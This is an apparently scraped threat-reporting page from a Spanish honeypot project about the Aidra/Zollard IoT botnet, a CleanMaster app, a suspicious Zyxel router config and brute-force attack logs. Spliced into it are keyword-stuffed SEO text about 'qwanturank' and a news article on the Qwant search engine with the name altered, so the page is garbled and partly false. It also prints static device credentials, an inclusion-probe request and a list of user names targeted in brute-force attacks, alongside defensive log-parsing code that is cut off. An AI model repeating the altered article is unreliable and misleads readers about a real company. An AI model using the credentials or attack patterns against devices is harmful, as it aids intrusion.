ATMA - Qwanturank

Mission

We identify and fight:

Are we hackers?

No, we are not. We only report on threats, exchange information with other researchers and warn owners, authorities and providers. Nevertheless, in the past we infiltrated a few hijacked hosts for a number of reasons:

Those were: a Truetel host in Taiwan (2009), another one belonging to a Tasmanian fireguard patrol (2010), an online shop in Poland (2011), several corporate servers (2011) in Spain (still online, see why and further info in Spanish) and a few routers and set-top boxes that had been infected by the "Aidra" botnet (beginning of 2012), before we had made our own traps for this new malware.

Reports

App for Android "CleanMaster"

While reviewing logs in April 2017, we found that some visits were automatically followed by others:
88.18.nnn.nnn - - [01/Apr/2017:16:35:46 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

88.18.nnn.nnn - - [01/Apr/2017:16:35:58 +0200] "GET /FolderInMyServer/FileInThatFolder HTTP/1.1" 206 1
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

54.244.48.54 - - [01/Apr/2017:16:39:43 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0); Connect Us

Other IPs behaving like that were 54.244.48.31 and 54.244.49.200, all owned by Amazon EC2. The "user agent" was truthful: all those visitors had installed the app developed by Cheetah Mobile, a Chinese company. Moreover, even when you are not browsing the web, it frequently connects to a Chinese IP. On April 23rd we asked them by email and never got an answer, so beware: you'll find nothing about this issue in their privacy policies, but the "CleanMaster" app browses the web along with you, literally.

Aidra botnet

In January 2012 we started detecting a large number of attacks, mainly over Telnet, coming from all sorts of devices such as home routers, IPTV / set-top boxes, DVDRs, VoIP devices, IP cameras and media centers that had been hijacked by a new malware, named "The Aidra bot-net" by its primary author.

Chances are that your desktop antivirus, firewall, etc. will neither detect it nor stop it. Try to keep your net devices off as long as possible, avoid -more than ever- default/empty/trivial passwords and close every port you don't really need.

Update January 2014: the latest Aidra-like malware is targeting all sorts of embedded devices and overloading them with bitcoin mining tools. See how this device will soon get fried (let alone the electricity bill...):

The example above is an IP camera manufactured by esslsecurity.com, built on top of an ARM hi3515 board, but any "internet of things" device might get infected, like SOHO routers, smart TVs, set-top boxes... or a fridge :) Below, the login page of a cheap Hikvision CCTV system, with such a brilliant default password for root as 12345.

Should you want to know more about this Aidra-like malware, known as Zollard, please see spamversand.de or deependresearch.org. For the list of IPs/hosts, see below.

We want everyone out there to know that we have been warning several hosting providers since 2012 about hosts of theirs acting as Aidra C&Cs. Some of them, like OVH, Linode, Beirtelecom and Corexchange, did nothing. Be warned: hosting your site on any of those providers means that you are likely to be blacklisted by most antimalware tools. By contrast, we congratulate a few responsible services and companies: Edis.at, VPS.net, Qc.to/Afraid.org and LusoVPS.com.

We especially want to thank those few individuals who answered our first call for help, reporting logs, sharing information, etc. Thank you Claus Marxmeier, "Internick.internick" and Robert Sauber.

Q: How can I disinfect my device?
A: Quite often, just rebooting it will work. However, try to access it using Telnet: if you can't, perhaps it has been persistently hijacked or, most probably, your device will be dead. Some Aidra builders were so dumb that not only will they not succeed, but they may also have left your device impaired. In that case, contact us, since chances are that you could recover it with a little help.

Q: How can I protect my devices?
A: If you really need Telnet, set a non-trivial password. Desktop tools such as antivirus, firewall, etc. will not help. They are made for taking care of the device that they are running on, not your router, IP cam, NAS, TiVo...

Q: How many devices are infected worldwide?
A: It has been said that there were nearly 11000, but that was absolutely uncertain: it was only an estimate that somebody made based on a screenshot of a command panel. There are several Aidra botnets and variants, and you would need to estimate how many devices have been infected by all of them. On top of that, just remember that a rebooted device will very often stay clean until a new infection, so the total can vary greatly in a matter of hours. Having said that, in June 2012 the number of infections began to decrease. Sadly, in August there are botnets with about 18000 zombies.

Q: Is my smartphone or tablet at risk?
A: At the moment, not especially. Somebody misunderstood our report. We just said that, in theory, Aidra could infect some smartphones, since it can run on all sorts of CPUs, but we have never detected a single one. Actually, Aidra would need to be adjusted to take into account a particular file system, hardware, etc. as well as try something other than Telnet. That's why Aidra seldom infects those devices: the first time we saw an infected Android device was in August 2012. Having said that, your smartphone can be infected by many other kinds of malware. On a side note: both iOS and Android are based on Linux but their internals are quite particular.

Q: What about my desktop computer or laptop?
A: Currently there is not much reason to worry about Aidra.

Q: Will Linux be unsafe from now on?
A: Not at all. Aidra takes advantage of dumb or lazy users/admins who don't care about passwords. You can buy the best safety-box in the world, but if you leave it open...

Q: Is Aidra such a great threat?
A: For individuals it depends on a number of things. If Aidra took over your set-top box, for example, chances are that you will just find the Internet slower than usual. But, if I were you, I wouldn't like to have any kind of malware inside my home router, because all data can be trivially stolen. Moreover, since September 2012 an Italian botnet master has been trying hard to raise money from Aidra, which he has used for his bitcoin affairs, but he is also interested in smartcards, which would be much more worrying. Apart from that, we bet that, given the careless attitude of governments and companies, sooner or later a malware of this kind will be improved enough to scare the entire world.

Q: Which countries are more affected?
A: As said, it is difficult to say even how many infected devices there are. In Europe most nets have been commanded from Italy (despite using servers in other countries), while most infected devices used to be in Sweden, Switzerland, the Netherlands and Poland. There are lots in India and China too, and not as many as expected in the USA and Japan. As of June 2012, Aidra had nearly vanished but there were still two very active botnet sets left. We sent evidence to the Carabinieri about the first one, and we got (not surprisingly) no answer. The other Aidra botnet set was alive and kicking, though quite silent since August. Strangely, it was targeting IPs mostly in the US. Last, although it was not its primary purpose, Aidra has been fought quite successfully for more than a year by Carnas's author (whose identity shall remain undisclosed).

Q: I would like to know in detail about Aidra, or get samples, source code...
A: Contact us and tell us about yourself or your organization (whichever applies) and what you want that material for.
Aidra hosts as of 17th Sept. 2012. For later ones, read below:

(*) Very active.
(**) Not a true Aidra but a "DDoS-only" version (Kaiten).
(***) Redirector disabled
(****) Attacking Monsanto websites

How to position yourself on the qwanturank keyword ?

To position yourself on the qwanturank term, you will have to use at least the two essential natural SEO techniques, the generation of quality content and the generation of quality backlinks and repeat all this until first place !

What does the term qwanturank mean ?

It is important to define qwanturank securite internet correctly. Indeed the lexical field and the semantics around a keyword are very important in order to rank on qwanturank. You have to use as much of the vocabulary around qwanturank as possible to make the search engine understand what you're talking about. The point is, here qwanturank is not a real word ! It was invented. So the difficulty is even greater for the algorithm to understand what it is about. The challenge is even greater for referencers. The latter will have to actually create the definition of the word qwanturank themselves. It is they who choose what their site will talk about and therefore how will define qwanturank. The fact is that for now, everyone is copying everyone and agreeing that qwanturank would be a kind of "product" offered by a SEO agency.

This works because by doing this, it is easy to increase the density of the qwanturank keyword in its content and thus help the algo to understand which query to answer. Because actually, it's still the base, the number of times you write a keyword in its content. Anyway, it's too late to talk about another subject now. The algorithm understands that when we speak of qwanturank, we speak overall of natural SEO, SEO agency and contest. Aside from these three topics, it's getting hard to position yourself.

Content strategy for qwanturank

Content level in the broad sense of the term, there are three types to use to position yourself on qwanturank :

Finally, on the subject of qwanturank, we should not forget to mention the netlinking strategy, which works very well in addition to the content. The higher the quality of the competitors ' sites, the faster their sites will position themselves on qwanturank. Sites that link to them need to talk about the topic and have the qwanturank keyword as their anchor.

Yet this is what a French search engine called Qwanturank does, from a small office located on the banks of the Seine.

The French start-up, whose product was launched 18 months ago, is drawing growing anger here that Google has too much control over how Europeans surf the web.

Some lawmakers in the region have already called for the dissolution of the American research giant, while the European Commission, the executive body of the European Union, is in the midst of a lengthy antitrust investigation into the share of around 85 % of Google in the European search engine market.

"You have to make a choice," said Jean Manuel Rozan, a former financier who co-founded Qwanturank in 2011, over a cup of coffee. "Europe is the only place in the world where people think Google is the Internet."

But it's easier to turn Europe's anti-Google sentiment into a successful business.

Google and its various services, including cards and online shopping, have a grip on how Europeans look for information. And despite the perceived antipathy of Europeans towards American technology companies like Amazon and Facebook, these companies continue to be strongly followed in the 28 countries of the block.

To stand out, Qwanturank sold 20% of its shares this year to Axel Springer, the German publisher, for about 6 million dollars, mainly to buy European servers. Mathias Döpfner, the publisher's chief executive, has openly criticized Google's dominance online. Mr. Rozan says Qwanturank made a profit of about 1.8 million dollars last year but will post a loss in 2014, as the company expands into new markets such as Germany. The company employs fewer than 50 people between its offices in Paris and Nice, a city in the south of France.

The French start-up has also tried to take advantage of the growing mistrust of Europeans regarding the way they are tracked online, as companies like Google and Facebook use the data collected on the history of Internet users to adapt advertising to the specific needs of each.

Along with other alternatives to Google like DuckDuckGo and Ixquick, a Dutch search engine, Qwanturank claims that it does not follow the movements of Internet users and sells advertising solely on the basis of search queries from individuals.

"We can build a valuable business that can deliver search results to people without following them," said Rozan, who said that people made about 1.6 billion search queries by Qwanturank in 2014 - or less than half of the search queries that Google processes in a single day.

Qwanturank also plans to launch a child-friendly search engine - Qwanturank Junior - in early 2015. Google has announced similar plans, but in a sign that the French government is keen to find an alternative to the US tech company, the national education ministry said it will start using Qwant Junior in some French schools next year.

"If you have three million children who will search on Qwanturank, then there will be six million parents who will know Qwanturank," said Eric Leandri, another of the co-founders of the start-up, who added that the start -up was in discussion with Axel Springer to become the default search engine on some of the publisher's websites. “When we launched the start-up, everyone explained to us why we shouldn't do it. Now they think it's a good idea. "

The other novelty of Qwanturank compared to the traditional search engine model is to include social media messages from services like Twitter directly in the search results.

When people use the company's search engine, for example, four columns appear on the web page that offer different takes on Internet queries. This ranges from traditional search results to what is known as the "Qnowledge Graph", which provides general research-based information from sites such as Wikipedia.

"We want to deliver results both on the web and on social media," said Qwanturank's Rozan. "If we just want to offer the same service as Google, we should stop now."

The French could also learn a few lessons from Europe's past. In 2008, a French consortium - supported by the country's politicians - created Quaero, an online research tool supposed to compete with its American counterparts. However, after $ 240 million in public and private funding and several efforts to reorganize the project, Quaero was closed in late 2013.

Despite previous failures to build a credible European search engine, co-founders of Qwanturank hope the focus on privacy and attempts to combine social media posts with traditional search results will set it apart from Google, whose projects are as diverse as an operating system for smartphones and which is trying to develop driverless cars.

"Google is no longer a search engine," said Leandri of Qwanturank. “We are just a search engine. We don't make robots ”.

On Sept. 18th we were receiving so much malware (and not only "Aidra fresh builds") that we thought it would be worth starting the historic track below. Please note that, by contrast, some of the Aidra builds that have been active for long are listed above.

(We had a hiatus from December to February)

130807
============
91.121.21.139 ks39329.kimsufi.com (OVH)
Versions like this one are compiled with messages in perfect Italian:
"Alla prossima BoSS... baciamo le mani!" (we kiss the new boss' hands)
"Hai sbagliato Frocio di Merda!" (you did it wrong, -insult-)

Aidra had slowed down its new releases,
so a handful of versions weren't published during these months.

131216
============
Starting with this one, nearly all new versions are "Zollard" malware.

140415
==================================
Surely a new 140202 version, quite complete "features":
Trying to permanently infect devices, adv. fraud
and stealing set-top credentials.
209.141.38.67 resolving as '.' :) FranTech Solutions (US)
209.141.40.181 FranTech Solutions (US)
50.3.116.59 Eonix Corporation (US)
178.79.183.247 li352-247.members.linode.com (UK)

We are glad "Vypor" has been visiting us in April from 107.196.197.216.

About our Twitter account
All tweets are randomly delayed: it may take hours or days since the actual detection. Besides, due to Twitter limits, we tweet only a fraction of all detections (usually we tend to skip already well-known bad IPs such as those famous Chinese SSH attackers).

For those who send traffic claiming to be "good", for academic purposes or for the sake of our own safety, please note that our policy is simple: a single unexpected SYN packet may be enough to be reported. If your intentions are not hostile, surely the world already knows about them and our reports don't mean a thing.

If you are a hosting company, ISP or the like, don't ask us for detailed logs, evidence, etc. unless they are really needed. Firstly, if you really want to know about them, you should know that in most cases it's as easy as just monitoring outbound traffic related to the reported attacks. Secondly, we cannot provide dozens of reports of that kind for free every single day. Keeping an eye on your customers' behaviour is your job, not ours. Besides, we will never answer dumb Twitter bots spitting "Please report that issue to blah blah" tweets, only to enter a "customer ticket hell" and get a final response such as "Sorry, you are not a customer of ours, please email to... ".

Currently, our tweets fall into one of these categories:
"ssh": SSH daemon/server, usually port TCP 22, although we watch alternative ports for most services.

"telnet": Telnet daemon/server, usually TCP 23.

"mailer": Email daemon/server, several ports.

"rdp": Windows terminal server (Windows), usually TCP 3389.

"vnc": Remote Desktop Servers, usually TCP 5900.

"ftp": File Transfer Protocol, usually TCP 21.

"spam": Email/forum/referral/you-name-it spammers, close affiliates or just those who pay for it.

"malware": Plain hosting, command & control servers, etc.

"http": Threats, scans, bad crawlers, etc. targeting web servers and related technologies such as HTTPS, proxies, PHP, *SQL...

"ntp": Network Time Protocol, commonly abused for DDoS amplification attacks.

"dns": Domain Name System, commonly abused for DDoS amplification attacks.

"smb": Windows shares (NetBIOS, SMB, CIFS).

"unspecified": Such as those targeting port 19 "CharGen", port scans, ping floods, etc.

Yet one more backdoor in an embedded device?

After taking a look at the file system of a used Zyxel_P-2612HNU that we recently got, we found a weird thing apart from the already known vulnerabilities such as the "NsaRescueAngel" issue. If you type gzip -d /mnt/NAND/etc/rc.conf.gz -c in a Telnet session, you'll get:

<< dl_auth
dl_auth_cpeId="1"
dl_auth_pcpeId="0"
dl_auth_uname="CISCO-serial123"
dl_auth_passwd=""
dl_auth_realm=""
dl_auth_nonce="3nanfc5fo"
dl_auth_uri="/"
dl_auth_algo="MD5"
dl_auth_cnonce="abcdef123"
dl_auth_opaque=""
dl_auth_qop=""
dl_auth_nc="00000001"
dl_auth_procookie="1"
dl_auth_ftype=""
dl_auth_fname=""
dl_auth_cmdkey=""
dl_auth_status="0"
dl_auth_starttime="0"
dl_auth_endtime="0"
dl_auth_futuretime="0"
dl_auth_size="0"
>> dl_auth

<< tr69_auth
tr69_auth_cpeId="1"
tr69_auth_pcpeId="0"
tr69_auth_realm="IgdAuthentication"
tr69_auth_nonce="3nanfc5fo"
tr69_auth_uri="/acs"
tr69_auth_algo="MD5"
tr69_auth_cnonce="aabbccdd"
tr69_auth_opaque=""
tr69_auth_qop="auth"
tr69_auth_nc="00000001"
>> tr69_auth

<< tr69_misc
tr69_misc_cpeId="1"
tr69_misc_pcpeId="0"
tr69_misc_authacs="0"
tr69_misc_authtype="digest"
tr69_misc_event="1"
tr69_misc_cmdkey=""
tr69_misc_incxml="0"
tr69_misc_incsoapact="1"
tr69_misc_acsgetrpc="0"
tr69_misc_bootstrap="0"
tr69_misc_tr69enable="1"
tr69_misc_tr64enable="0"
tr69_misc_prevtime="0"
>> tr69_misc
<< mgmt_server
mgmt_server_cpeId="1"
mgmt_server_pcpeId="0"
mgmt_server_acsurl=
mgmt_server_acsuname="000319-DMA66"
mgmt_server_acspasswd="000319-DMA66"
mgmt_server_perinfena="1"
mgmt_server_perinfint="3600"
mgmt_server_perinftime="0"
mgmt_server_paramkey=""
gmt_server_conrequrl=
mgmt_server_conrequname="000319-DMA66"
mgmt_server_conreqpasswd="000319-DMA66"
mgmt_server_upgsmanaged="0"
mgmt_server_udpconrequrl="10.10.10.250:8080"
mgmt_server_udpconreqnotifylimit="0"
mgmt_server_stunenable="0"
mgmt_server_stunserveripaddress="20.20.20.3"
mgmt_server_stunserverport="3478"
mgmt_server_stunusername="acsstunuser"
mgmt_server_stunpasswd="acsstunpasswd"
mgmt_server_stunmaxkeepalivetime="100"
mgmt_server_stunminkeepalivetime="10"
mgmt_server_natdetected="0"
mgmt_server_mngdevnotifylimit="10"
>> mgmt_server

<< manageable_device
manageable_device_Count="0"
>> manageable_device

<< lanconf_security
lanconf_security_cpeId="1"
lanconf_security_pcpeId="1"
lanconf_security_confPassword="tr64conf"
lanconf_security_resetPassword="tr64reset"
>> lanconf_security

20.20.20.20 belongs to CSC (Computer Sciences Corporation, Virginia, US) and there are/were four domains that pointed to that IP: bhsywg.com (protected whois), gporodiedan.com (Mexican company), advocaciatorresrn.com (Brazilian company) and kedvezo-hitelek.com (protected whois). Could someone skilled in TR069 please tell us whether this could be a backdoor and who might have put it here or whether, on the contrary, it's just debugging data left behind.
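A quick way to triage a dump like the one above is to parse the "<< section ... >> section" blocks and list every credential-like field. The following is an added example, not part of the original page or of any Zyxel tool; the function names and the wording of the findings are assumptions, and the sample is a shortened excerpt of the dump shown above.

```python
import re

SECTION_OPEN = re.compile(r'^<<\s*(\w+)')
SECTION_CLOSE = re.compile(r'^>>\s*(\w+)')
# key="value" or key=bare; several pairs may share one line
PAIR = re.compile(r'(\w+)=(?:"([^"]*)"|(\S*))')
# keys ending in passwd/password; "stem" is used to find the matching user-name key
SECRET_KEY = re.compile(r'^(?P<stem>\w+?)(passwd|password)$', re.IGNORECASE)

# Shortened excerpt of the rc.conf dump shown on this page.
# The dl_auth_realm/dl_auth_nonce line is deliberately run together (constructed)
# to show that the parser tolerates more than one pair per line.
SAMPLE_CONF = '''\
<< dl_auth
dl_auth_uname="CISCO-serial123"
dl_auth_passwd=""
dl_auth_realm="" dl_auth_nonce="3nanfc5fo"
>> dl_auth
<< tr69_misc
tr69_misc_tr69enable="1"
>> tr69_misc
<< mgmt_server
mgmt_server_acsurl=
mgmt_server_acsuname="000319-DMA66"
mgmt_server_acspasswd="000319-DMA66"
mgmt_server_conrequname="000319-DMA66"
mgmt_server_conreqpasswd="000319-DMA66"
mgmt_server_stunusername="acsstunuser"
mgmt_server_stunpasswd="acsstunpasswd"
>> mgmt_server
<< lanconf_security
lanconf_security_confPassword="tr64conf"
lanconf_security_resetPassword="tr64reset"
>> lanconf_security
'''


def parse_rc_conf(text):
    """Return {section: {key: value}} for every '<< name' ... '>> name' block."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        opened = SECTION_OPEN.match(line)
        if opened:
            current = sections.setdefault(opened.group(1), {})
            continue
        if SECTION_CLOSE.match(line):
            current = None
            continue
        if current is None:
            continue  # ignore anything outside a section
        for key, quoted, bare in PAIR.findall(line):
            current[key] = quoted if quoted else bare
    return sections


def audit(sections):
    """List (section, key, issue) for every non-empty secret in the config."""
    findings = []
    for name, kv in sections.items():
        for key, value in kv.items():
            m = SECRET_KEY.match(key)
            if not m or not value:
                continue  # not a secret field, or secret left empty
            stem = m.group("stem")
            user_key = next((stem + s for s in ("uname", "username")
                             if stem + s in kv), None)
            if user_key and kv[user_key] == value:
                issue = "password equals user name"
            else:
                issue = "static secret stored in clear text"
            findings.append((name, key, issue))
    # TR-069 switched on while no ACS URL is configured, as in the dump above
    if sections.get("tr69_misc", {}).get("tr69_misc_tr69enable") == "1":
        if not sections.get("mgmt_server", {}).get("mgmt_server_acsurl", ""):
            findings.append(("tr69_misc", "tr69_misc_tr69enable",
                             "TR-069 enabled with no ACS URL set"))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_rc_conf(SAMPLE_CONF)):
        print(*finding, sep=" | ")
```

The findings only describe what the file contains; whether the values are vendor defaults, ISP provisioning data or leftovers is the open question the paragraph above asks.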

Since June 21st the website escolademusica.molinsderei.org was attacking servers in Spain. First of all, we warned the ISP, the webmaster and that council's authorities (none was kind enough to reply with a mere "thanks") and afterwards we investigated who the actual attackers could be. Let's suppose that in "Molins de Rei" there are no fanatics related to that website, so we can assume they were using hijacked servers, apart from some proxies and a lot of IPs from Islamic countries. After some searching on Google, Whois, Geolocation, etc. we got to know that the culprits are an Islamic gang of script kiddies who compete mostly for defacements, while sharing pro-Islamic interests.

The good news is that they are clumsy and not very skilled: most just look for misconfigured servers with "PUT" enabled; they simply try to upload a file and then download it, which means that PUT is working for sure. So we got one of those files, a GIF image that its author uses as a "signature" (filename in Russian, he's smart as can be) and we waited...

In a few hours we saw the first "PUT /nyet.gif" + "GET /nyet.gif" attempt. Believing he had succeeded, he hurried to report his "achievement" to his mates :) on the infamous www.zone-h.org and, in a moment, we began receiving more attacks of the kind as well as some XSS. Some days later they gave up, but meanwhile we have been collecting all their IPs (please note: we are not listing proxies or hijacked servers, which, BTW, is mostly a Kosovar speciality):

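Two log patterns described on this page can be searched for in a web server access log: the follow-up visits from the "CleanMaster" report (a page fetched by a visitor and, minutes later, by a different IP with a different user agent and no referer) and the "PUT /nyet.gif" + "GET /nyet.gif" upload probes above. This is an added example, not code from the original page; the function names, time windows and sample log lines (documentation addresses) are assumptions constructed for illustration.

```python
import re
from datetime import datetime

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample lines, modelled on the two incidents described on this page.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jun/2013:10:00:01 +0200] "PUT /nyet.gif HTTP/1.1" 405 312 "-" "curl/7.30"
203.0.113.7 - - [21/Jun/2013:10:00:03 +0200] "GET /nyet.gif HTTP/1.1" 200 43 "-" "curl/7.30"
192.0.2.10 - - [01/Apr/2017:16:35:46 +0200] "GET /private/ HTTP/1.1" 200 8286 "-" "Mozilla/5.0 (Linux; Android 5.0.2) Chrome/56.0"
192.0.2.10 - - [01/Apr/2017:16:35:58 +0200] "GET /private/file HTTP/1.1" 206 1 "http://example.test/private/" "Mozilla/5.0 (Linux; Android 5.0.2) Chrome/56.0"
198.51.100.54 - - [01/Apr/2017:16:39:43 +0200] "GET /private/ HTTP/1.1" 200 8286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"""


def parse(lines):
    """Parse access-log lines into dicts sorted by time; malformed lines are skipped."""
    entries = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        entries.append(e)
    return sorted(entries, key=lambda e: e["ts"])


def follow_up_visits(entries, window_s=600):
    """Successful GETs that are repeated within window_s seconds by another IP
    using another user agent and sending no referer.
    Returns (path, first_ip, follower_ip, delay_seconds) tuples."""
    hits = []
    for i, first in enumerate(entries):
        if first["method"] != "GET" or not 200 <= first["status"] < 300:
            continue
        for later in entries[i + 1:]:
            delay = (later["ts"] - first["ts"]).total_seconds()
            if delay > window_s:
                break  # entries are time-sorted, nothing later can match
            if (later["method"] == "GET" and later["path"] == first["path"]
                    and later["ip"] != first["ip"]
                    and later["ua"] != first["ua"]
                    and later["referer"] in ("-", "", None)):
                hits.append((first["path"], first["ip"], later["ip"], int(delay)))
    return hits


def put_get_probes(entries, window_s=300):
    """A PUT followed by a GET of the same path from the same IP: the upload
    test described above. put_accepted tells whether the server took the PUT."""
    probes = []
    for i, put in enumerate(entries):
        if put["method"] != "PUT":
            continue
        for later in entries[i + 1:]:
            if (later["ts"] - put["ts"]).total_seconds() > window_s:
                break
            if (later["method"] == "GET" and later["ip"] == put["ip"]
                    and later["path"] == put["path"]):
                probes.append({"ip": put["ip"], "path": put["path"],
                               "put_accepted": put["status"] in (200, 201, 204),
                               "get_status": later["status"]})
                break  # one finding per PUT is enough
    return probes


ENTRIES = parse(SAMPLE_LOG.splitlines())

if __name__ == "__main__":
    print(follow_up_visits(ENTRIES))
    print(put_get_probes(ENTRIES))
```

In the sample, the PUT is rejected but the GET still returns 200, which is the situation described above where the file was already on the server and the prober believed the upload had worked.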
Beware fake Microsoft assistance scam

In May-June 2014 several people in Spain were phoned by a fake Microsoft customer service. So far these are the numbers we got to know: 16077670057 and 15124511556. Beware also of 4935120443, 442033100000 and 18176499077.
Atma.es under attack

No wonder, just another one, but this time it was more intense than usual although not sophisticated at all: they simply tried to overload this server by downloading some files over and over. By using our own deny list, exceptionally and urgently updated during those days, we got rid of most malicious visitors (nearly all being proxies in infected boxes or Tor nodes). Happily, a number of them soon went offline because they could not cope with some bounced-back traffic :) Please, dear attacker: (as long as you can't find a better way) keep on trying, we miss your huge amount of requests!!!
Yet another University scanning the entire world!

On this website we have already talked about the University of Columbia peeking inside each and every IP in the world for years. Well, it seems to be the fashion these days in the USA, since in 2013 the University of Michigan began a similar "research". If you want to get rid of those visits, block all IPs from 141.212.121.2 to 141.212.121.124.
WTF is going on with some Microsoft's IPs?

8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.62.36.16 | 2012-11-03 17:15:18 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.61.24.174 | 2012-11-08 06:53:08 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.62.181.42 | 2012-11-08 06:30:55 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.62.160.84 | 2012-11-08 05:49:12 | vncprobe
One incident in detail:
08/11/2012 04:13:32 Got connection from client 168.62.160.84
08/11/2012 04:13:32 authProcessClientMessage: authentication failed from 168.62.160.84
08/11/2012 04:13:32 rfbAuthProcessClientMessage: password check failed
08/11/2012 04:13:32 Client 168.62.160.84 gone
08/11/2012 04:13:32 Statistics events Transmit/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:32 Statistics events Received/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:33 Got connection from client 168.62.160.84
July 2013, some more detected from MSN-AS-BLOCK:
137.116.213.183 137.116.213.211 137.116.240.105
137.117.168.91 137.117.169.58 137.135.0.123
168.63.214.105 168.63.255.197
(Yet another) Remote desktop attack
We receive attacks on port 3389 on a daily basis, but these days they have increased hugely. This is what we got yesterday (Sept. 22nd) from one IP alone:


Universities and hacking

The fact that there are important and prestigious institutions with infected computers is worrying, even more so when we are talking about departments that teach computing. In the past we warned some of them in Germany, the USA and the UK, and all of them sorted the issue out promptly. On the contrary, some others like the Spanish UNED neither answered nor fixed them. This September it happened again: this time we warned the "Dipartimento di Informatica" of the University of Milan about 159.149.71.7 kermit.crema.unimi.it, which was attacking others' 3389 ports. More than one month ago, we wrote to nine email addresses: professors, researchers and administration... none of them was kind enough to write back a single line. So we still don't know whether it was an infected box or they were the true hackers but, good enough, at least we have detected no more attacks since then.

Why does Nokia want to know my email password?

Did you know that when you use Nokia's email app, you are giving them your address and password, as seen in this blog? In Nov. 2011 we checked it out ourselves using a Nokia X3-02 and a Gmail account:

Chinese and russian scanners
In Oct. 2011 a number of IPs came to our attention. Mostly located in China, those people have been scanning the rest of the world for years.

They fall into two groups: those clearly linked to "Proxyfire", and other scanners.
Note that it is useless to complain or warn anyone, since these are not hijacked devices. Apart from their other intentions, their actions make many others waste time and resources, and that's why we [will do our best for disturbing them a little from March on.] are glad to see that Proxyfire has been facing some trouble during April:

The other scanners needed to set up at least five spare (until then) sites after April 2012:
173.201.240.31 proxyproxys·com piggmail·com verysurf·com nsegame·com

A boo for a couple image-hosting places
In Sept. 2011 our site suffered a persistent attack from 62.129.242.122, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we learned that those Indonesians were using a few image-sharing sites for their "soft", so we contacted iconspedia.com and tinypic.com asking for their help (a third site was clearly involved in the malicious events). No answer at all.

Where on earth are the Honeypots?
After reading the "Cyber Crime Alert" report by the FBI (spring of 2011), it seems that the bad guys think that here in Spain we run an incredible 69 per cent of the honeypots in the world and, besides, they usually share the IPs where honeypots are supposed to be. Well, concerning our own IPs, whether they are right or not must remain unrevealed, but the given percentage is utterly wrong. In fact, we don't know of any other honeypot here apart from ours.

Weird ways of fighting cybercrime:
Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET pollbooth.php?include_path HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

No comment :D

September of 2009: attackers tried to log in under 10374 different user names.
The most attacked were:

Attempts | User name
9850 | root
1034 | admin
690 | test
431 | oracle
264 | user
224 | guest
208 | robert
206 | mysql
195 | michael
190 | paul
190 | info
177 | postgres
176 | amanda
176 | adam
168 | sales
166 | martin
162 | backup
154 | student
152 | ftpuser
148 | suporte
132 | testing
130 | nagios
130 | eric
130 | david
126 | web
126 | tester
124 | john
120 | richard
115 | sarah
114 | sam
114 | patrick
110 | bruce
107 | matt
106 | mark
104 | cyrus
102 | teste
101 | marc
100 | webmaster
100 | mail
100 | download
Advice: choosing user names in a language other than English is safer. Spanish speakers should avoid "David", "Amanda" and "Martin" (common names in both languages).
Bad boys never sleep:
2009, nightfall on the 24th. While many countries were celebrating Christmas Eve, attackers were taking advantage of it. The most striking attack we detected during those hours was an SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20,859 username + password combinations.

2010, July the 7th. While millions are enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reports a (not actually) successful SSH dictionary attack:

Jul 7 19:27:42 (void) sshd[28641]: Accepted password for (not shown) from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 (void) sshd[12823]: Accepted password for (not shown) from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 (void) sshd[8048]: Accepted password for (not shown) from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 (void) sshd[28775]: Accepted password for (not shown) from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 (void) sshd[31450]: Accepted password for (not shown) from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 (void) sshd[8496]: Accepted password for (not shown) from 188.24.255.242 port 30856 ssh2
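
Both the user-name ranking above and the "Accepted password" lines can be pulled out of an sshd log with a few lines of parsing. This is an added example, not ATMA's own tooling: the function name, the failure threshold and the sample log (constructed, with documentation-range IPs) are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in OpenSSH's syslog format; documentation-range IPs.
SAMPLE_LOG = """\
Jul  7 19:20:01 host sshd[2101]: Failed password for root from 203.0.113.7 port 40112 ssh2
Jul  7 19:20:03 host sshd[2103]: Failed password for invalid user oracle from 203.0.113.7 port 40120 ssh2
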